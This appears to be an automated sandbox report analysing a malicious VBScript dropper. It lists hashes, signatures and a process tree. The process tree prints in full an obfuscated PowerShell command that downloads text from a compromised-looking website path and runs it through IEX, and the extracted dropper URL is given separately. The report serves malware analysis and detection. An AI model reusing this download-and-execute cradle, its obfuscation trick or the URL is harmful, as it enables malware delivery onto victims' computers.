Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    29/12/2024, 13:43

General

  • Target

    GVTCXYI83010.vbs

  • Size

    844B

  • MD5

    1414060f446d9dc216c622be120be514

  • SHA1

    0f1ce25ce0451fdc55636346271bf09054e00fc0

  • SHA256

    f43970ba4414ecdfe5d42fccb69528917e2fe58dbe684a009c455b1cfacfcb23

  • SHA512

    2e340e98b733cfbef8b671263e3ebb0dafabefa97594ef3e3f59ee406a97075322ba411c5fa6d988e3e892b1bd5b582b4a66f2bce8978d5635b6c7334bdeb11e

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.boschtransport.co.za/wp-includes/.Final.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\GVTCXYI83010.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.replace('__','n').replace('--','adS'),[Microsoft.VisualBasic.CallType]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://www.boschtransport').Replace('################','.co.za/wp-includes/.Final.txt'))|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2612

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2612-4-0x000007FEF537E000-0x000007FEF537F000-memory.dmp

    Filesize

    4KB

  • memory/2612-5-0x000000001B5A0000-0x000000001B882000-memory.dmp

    Filesize

    2.9MB

  • memory/2612-6-0x0000000002860000-0x0000000002868000-memory.dmp

    Filesize

    32KB

  • memory/2612-8-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2612-7-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2612-10-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2612-9-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2612-11-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

    Filesize

    9.6MB

  • memory/2612-12-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

    Filesize

    9.6MB